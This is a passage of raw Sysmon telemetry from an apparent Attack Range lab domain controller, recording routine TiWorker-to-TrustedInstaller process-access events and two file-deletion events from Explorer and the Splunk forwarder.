dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.916{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms~RF1b08e.TMPMD5=B9BD716DE6739E51C620F2086F9C31E4,SHA256=7116FF028244A01F3D17F1D3BC2E1506BC9999C2E40E388458F0CCCC4E117312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.901{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=286586234FADE31358D2A59B684B0511,SHA256=819FB9368F0CBBABB35DE0FC07545C5F6B5B54456D140ADE91416B417D8AABFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 